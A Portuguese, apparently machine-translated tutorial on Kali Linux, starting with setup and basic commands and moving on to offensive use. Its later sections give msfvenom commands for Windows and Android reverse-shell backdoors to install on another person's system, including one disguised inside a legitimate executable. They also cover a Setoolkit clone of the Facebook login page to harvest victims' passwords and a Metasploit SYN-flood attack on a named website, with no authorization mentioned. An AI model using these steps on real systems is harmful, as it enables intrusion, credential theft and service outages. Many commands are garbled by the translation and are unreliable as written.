Kali Linux Basics

Kali Linux Basics
Kali Linux é uma distribuição baseada em Debian para hackers éticos, testadores de penetração, pesquisadores de segurança e entusiastas. É estável, atualizado, pronto para a empresa, de código aberto e distribuição bem mantida por segurança ofensiva. O ambiente de desktop padrão do Kali Linux é o gnome, mas também oferece uma variedade de outros ambientes de desktop, incluindo KDE, Mate, LXDE e outros. Ele pode ser instalado em vários tipos de sistemas, incluindo laptops, servidores, dispositivos ARM (Raspberry Pi etc) e nuvem. Ele também possui uma versão portátil para dispositivos Android chamado Nethunter, que pode ser usado no sistema operacional Android e vem com ferramentas e scripts pré-instalados que oferecem portabilidade ao fazer testes de auditoria ou penetração de segurança.

Por que você deve usar o Kali Linux?

Kali Linux é usado principalmente por testadores de penetração, auditores de segurança, investigadores forenses e pesquisadores. Tem quase todas as ferramentas ou script pré-instalado que podem ser usados ​​para qualquer um dos propósitos acima. Você pode usar o Kali Linux para quebrar redes Wi -Fi, para executar o Open Source Intelligence (OSINT) em alguém, para hackear sites e redes e muito mais.

Além de hackers éticos, o Kali Linux também possui um conjunto de ferramentas para investigação forense. Forense é outro ramo importante e emergente da segurança cujo principal objetivo é coletar e analisar evidências de uma atividade criminosa e depois voltar a backtrack criminosos cibernéticos. A investigação forense ajuda a rastrear e remover efeitos maliciosos (backdoors, malwares) resultou de uma atividade criminosa e calculando/lidando com a perda após um ataque cibernético. O Kali Linux tem um modo de vida furtivo separado para operações "forenses" nas quais não deixa nenhuma impressão digital no sistema do host.

Ficar confortável com o ambiente de Kali

Kali não é feito para usuários comuns e não é muito fácil de usar, como Windows ou Ubuntu. Seu ambiente padrão é raiz, o que não é muito fácil de usar e é bastante perigoso para Noobs. Também não possui alguns utilitários básicos, como Snap, VirtualBox e outros utilitários úteis que estão presentes no Ubuntu.

As coisas importantes primeiro

A primeira coisa a fazer é fazer um usuário sem raios

raiz@kali: ~# adduser kali
Adicionando o usuário 'kali'…
Adicionando novo grupo 'Kali' (1002)…
Adicionando novo usuário 'Kali' (1002) com grupo 'kali'…
Criando diretório doméstico '/home/kali'…
Copiando arquivos de '/etc/skel'…
Nova Senha:
… Snip…
root@kali: ~# userMod -AG sudo kali
Inicialize o banco de dados PostgreSQL da Metasploit Framework
root@kali: ~# msfdb init
Criando o usuário do banco de dados 'msf'
Digite a senha para nova função:
Entre novamente:
Criando bancos de dados 'msf' e 'msf_test'
… Snip…

Adicione as seguintes linhas às suas fontes “/etc/apt/.List ”arquivo

Deb http: // http.Kali.Org/Kali Kali-Rolling principal contribuinte
# Para acesso ao pacote de origem, descomamento a seguinte linha
# Deb-Src http: // http.Kali.Org/Kali Kali-Rolling principal contribuinte
Instale outras ferramentas úteis.
root@kali: ~# Apt -get Update && apt upgrade -y
root@kali: ~# apt-get install virtualbox virtualBox-dkms gobuster Tor Tor-Browser
OpenVPN HTOP Atom Deepin -terminal Tilix -y

Gerenciando os serviços padrão de Kali

Kali vem com muitos serviços não-padrão pré-instalados, como PostgreSQL, MySQL, SSH, HTTP. Se não estiver configurado corretamente, esses serviços começarão como um processo em segundo plano quando o seu Kali Linux inicializar e essas portas abertas podem ser uma ameaça à segurança do seu sistema.

Nesta seção, veremos como esses serviços funcionam e como você pode configurá -los corretamente e como você pode usá -los. A maneira padrão de configurar uma ferramenta ou um serviço é lida seu arquivo de leitura doc. O arquivo readme contém o procedimento padrão para configurar e usar uma ferramenta ou um serviço. Os arquivos ReadMe geralmente estão localizados em pasta “Usr/Share/Doc/[Tool_name]/ReadMe”.

Serviço de shell seguro (SSH)

O Secure Shell (SSH) tem sido usado há muito tempo como uma ferramenta padrão para executar comandos, transferir arquivos e outros fins de administração remota remotamente. O pacote inclui ssh (cliente) e sshd (serviço) para controlar outras máquinas remotamente.

O serviço SSH não é iniciado por padrão quando Kali Boots Up, você pode iniciá -lo digitando,

root@kali: ~ $ service ssh start
root@kali: ~ $ netstat -Antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0:* Ouça 6601/sshd
tcp6 0 0 ::: 22 :::* Ouça 6601/sshd

Se você deseja que o SSHD comece toda vez que seu kali inicializa. Tipo

root@kali: ~ $ update-rc.D SSH Ativar

Se você quiser que alguém faça login no seu PC via SSH, ele usará o nome de usuário e a senha do seu kali para autenticação de login. Então, melhor altere sua senha padrão "Toor" para algo seguro.

root@kali: ~ $ passwd
Alterando a senha para root.
Senha atual:
Nova Senha:
Vestem nova senha:
Passwd: senha atualizada com sucesso

Agora, recarregue o serviço SSH para afetar as mudanças

root@kali: ~ $ service ssh recarregar

Serviço HTTP

O serviço HTTP é muito benéfico ao executar tarefas relacionadas a hackers éticos. Ele pode ser usado para hospedar páginas e sites de phishing falsos, para transferir arquivos para servidores de vítimas remotas. Com os aplicativos da Web se tornando mais populares todos os dias, agora é mais importante ter conhecimento para entender e operar servidores HTTP como o Apache.

Apache é um servidor HTTP que vem pré-instalado em Kali. O serviço HTTP do Apache está desativado por padrão, mas você pode iniciá -lo usando o seguinte comando.

root@kali: ~ $ service Apache2 Iniciar

O Apache sediará sua página do Debian Padrão em seu domínio local na porta HTTP padrão 80. Vá para http: // localhost: 80/

Para iniciá -lo toda vez que seu kali começa, digite

root@kali: ~ $ update-rc.D Apache2 Ativar

Você também pode configurar o Apache em porta não padrão modificando seu arquivo de configuração (/etc/apache2/portas.conf)

root@kali: ~ $ nano/etc/apache2/portas.conf

Salve o arquivo e depois corra

root@kali: ~ $ service apache 2 reiniciar

Agora, o Apache Will Server na porta “1234” em vez da porta padrão 80.

Se você quiser ler a documentação completa do Apache Server, vá para o diretório "/usr/share/doc/apache2/", digite

root@kali: ~ $ cd/usr/share/doc/apache2/
root@kali:/usr/share/doc/apache2 $ gzip -decompressor readme.Debian.gz
root@kali:/usr/share/doc/apache2 $ nano readme.Debian

Uma lista de alguns comandos úteis

localizar é usado para localizar um arquivo no Linux, antes de usar este comando, você deve atualizar seu banco de dados primeiro

root@kali: ~# atualizadob
root@kali: ~# localize uqjhssvf.JPEG
/root/uqjhssvf.JPEG

encontrar é mais agressivo e não depende do banco de dados. Ele pesquise recursivamente o arquivo em determinado diretório e seus subdiretos.

root@kali: ~# encontre ./ -Name Main.py
./Desktop/Main.py

wget pode ser usado para baixar uma página ou arquivo na web no terminal.

root@kali: ~# wget tinytuba.com
--2019-05-11 08: 58: 48-- http: // tinytuba.coma
Resolvendo Tinytuba.com (Tinytuba.com)… 52.216.129.66
Conectando -se a Tinytuba.com (Tinytuba.com) | 52.216.129.66 |: 80… conectado.
Solicitação HTTP enviada, aguardando resposta… 200 ok
Comprimento: 1551 (1.5K) [Texto/html]
Economizando para: 'Índice.html '
índice.html 100%[==========================>] 1.51k --.-Kb/s em 0s
2019-05-11 08:58:50 (56.5 mb/s) - 'Índice.HTML 'salvo [1551/1551]
raiz@kali: ~# Firefox Index.html

principal fornece informações sobre sua CPU, uso de memória e outras estatísticas.

história Mostre a lista de comandos anteriores que você inseriu em seu terminal.

Alguns outros comandos úteis que você pode encontrar na internet são LS, RM, RMDIR, Adduser, Deluser, Serviço, Nano, Cat, Mais, Leme, Uname, Whoami etc

Gerando backdoors maliciosos

Você pode gerar binários de exe maliciosos usando "msfvenom" kali linux e instalá -los no sistema de outra pessoa para controlá -lo remotamente.

root@kali: ~ $ msfvenom -a x86 --platform windows -b '\ x00' -p windows/meterpreter/reverse_tcp
LHOST = [endereço IP do atacante] lport = [porta do atacante no] -f exe> diversão.exe
Encontrado 11 codificadores compatíveis
Tentando codificar a carga útil com 1 iterações de x86/shikata_ga_nai
x86/shikata_ga_nai conseguiu com o tamanho 368 (iteração = 0)
x86/shikata_ga_nai escolhido com tamanho final 368
Tamanho da carga útil: 368 bytes
Tamanho final do arquivo exe: 73802 bytes
root@kali: ~ $ ls diversão.exe
diversão.exe
root@kali: ~ $ File Fun.exe
diversão.EXE: PE32 Executável (GUI) Intel 80386, para MS Windows

Para gerar backdoor para os sistemas Windows de arquitetura X64, digite o seguinte comando.

root@kali: ~ $ msfvenom --platform windows -b '\ x00' -p windows/x64/meterpreter/reverse_tcp
LHOST = [endereço IP do atacante] lport = [porta do atacante no] -f exe> diversão.exe
[-] nenhum arco selecionado, selecionando arco: x64 da carga útil
Encontrado 3 codificadores compatíveis
… Snip…
root@kali: ~ $ File Fun.exe
diversão.EXE: PE32+ executável (GUI) x86-64, para MS Windows

Incorporar backdoors em aplicações legítimas usando Kali

Você também pode incorporar seu código de backdoor malicioso em um arquivo exe inofensivo, como o Adobe Reader Installer ou algum media player executável. O executável resultante parecerá um aplicativo de software legítimo, mas quando executado no computador da vítima, ele executará seu backdoor malicioso ao lado dessa aplicação legítima, resultando em comprometimento do PC da vítima.

Já existem alguns Windows executáveis ​​presentes no Kali Linux, que usaremos para demonstração.

root@kali: ~ $ ls/usr/share/windows binários/
backdoors/ exe2bat.exe fport/ klogger.exe nbtenum/ plink.EXE VNCViewer.exe whoami.exe
enumplus/ fgdump/ hyperion/ mbenum/ nc.exe radmin.exe wget.exe

Injetaremos nossa carga útil em “VNCViewer.exe ”executável.

root@kali: ~ $ msfvenom -a x86 --platform windows -x/usr/share/windows binários/vncviewer.exe
-K -P Windows/MeterPreter/Reverse_tcp lhost = [IP do atacante] lport = [porta do atacante]
-e x86/shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.exe
Encontrado 1 codificadores compatíveis
Tentando codificar a carga útil com 3 iterações de x86/shikata_ga_nai
… Snip…
Tamanho da carga útil: 422 bytes
Tamanho final do arquivo exe: 421376 bytes
Salvo como: vncviewer.exe

Gerando backdoors do Android

Para controlar remotamente os telefones Android, você pode gerar arquivos APK maliciosos usando MSFVENOM.

root@kali: ~ $ msfvenom -p Android/meterpreter/reverse_tcp lhost = [IP do atacante]
Lport = [porta do atacante no] r> qualquer coisa.APK
[-] Nenhuma plataforma foi selecionada, escolhendo MSF :: Module :: Platform :: Android da carga útil
[-] nenhum arco selecionado, selecionando arco: dalvik da carga útil
Nenhum codificador ou badchars especificado, emitindo carga útil bruta
Tamanho da carga útil: 10087 bytes

Engenharia Social usando Setoolkit

Engenharia Social é o uso do engano para enganar alguém a revelar suas informações confidenciais ou pessoais que podem ser mal utilizadas para fins maliciosos.

A técnica de engenharia social mais usada é phishing, na qual você tenta enviar mensagens, e -mails ou telefonemas para obter informações pessoais, especialmente informações relacionadas ao dinheiro. Em ataque de phishing, o recebedor de um e -mail é persuadido de que ele recebeu o e -mail de uma fonte genuína como um banco ou um departamento do governo e depois enganou para revelar suas credenciais sensíveis.

Nesta demonstração, clonaremos uma página de login do Facebook usando o Setoolkit e hospedaremos essa página em nosso servidor HTTP, então enviaremos o endereço IP do servidor HTTP para a vítima. Quando a vítima faz login na nossa página de login do Facebook falsa, esta página enviará seu nome de usuário e senha para nossa máquina Kali.

Tipo Setoolkit No terminal, o setOolkit será aberto

  • Selecione no menu: [Selecione 1] ataques de engenharia social
  • Selecione no menu: [Selecione 2] Vetores de ataque do site
  • Selecione no menu: [Selecione 3] Método de ataque de colheita de credenciais
  • Selecione no menu: [Selecione 2] Site CLONER
  • Selecione no menu: insira o endereço IP do computador local
  • Selecione no menu: insira o URL para clonar: www.Facebook.com
  • Pressione Enter e Tipo Y

Quando a vítima insere nosso endereço IP em seu navegador, ele será apresentado à nossa falsa página de login do Facebook que criamos anteriormente. Temos que esperar até que a vítima entre seu nome de usuário e senha em nossa página clonada. A página falsa no Facebook vai ficar assim,

Enquanto o usuário inserir suas credenciais, o Setoolkit as exibirá no terminal.

Esta demonstração estava na rede local, se você quiser fazer isso em IP público, você precisa fazer o encaminhamento de porta no seu roteador ou pode usar o ngrok para IP público e número da porta.

Negação de negação de serviço (DOS) usando metasploit

O ataque de negação de serviço (DOS) é um tipo de ataque a um sistema ou rede que diminui ou restringe a acessibilidade dos recursos do sistema a seus usuários legítimos. O objetivo de um ataque do DOS não é roubar informações confidenciais, em vez de invasor tenta o sistema de vítimas de inundação com solicitações de serviço não legitimadas para sobrecarregar seus recursos.

Um ataque distribuído de negação de serviço (DDoS) precisa de um grande número de sistemas (referidos como zumbis) atacando um único alvo, resultando em negação de serviço. Um único ataque de DOS não pode afetar grandes servidores e redes corporativos, é por isso que o DDoS é mais eficaz e letal. Também é difícil rastrear e bloquear o ataque de DDoS porque centenas e milhares de sistemas de zumbis atacam um único host.

São muitas ferramentas e scripts disponíveis para ataques DOS e DDoS, mas usaremos um módulo auxiliar de metasploit para demonstração. Vamos tentar derrubar um site de amostra “www.Jarusa.com ”.

Primeiro, vá para https: // www.IsitdownRightnow.com/ e confirme que o site está em funcionamento

O site está acordado. Agora, o Open Metasploit Framework Console em seu terminal.

root@kali: ~ $ msfconsole
… Snip…
msf5> use auxiliar/dos/tcp/synflood

Descobrir www.Jarusa.como endereço IP e defina -o como RHOST e depois execute o ataque

Depois de um tempo, você verá que o site não está disponível. Confirme usando https: // www.IsitdownRightnow.coma

CONCLUSÃO

Kali Linux é um lar para hackers éticos e este tutorial esperançosamente o esclareceu no básico do Kali Linux, o que pode fazer e como começar com seu uso.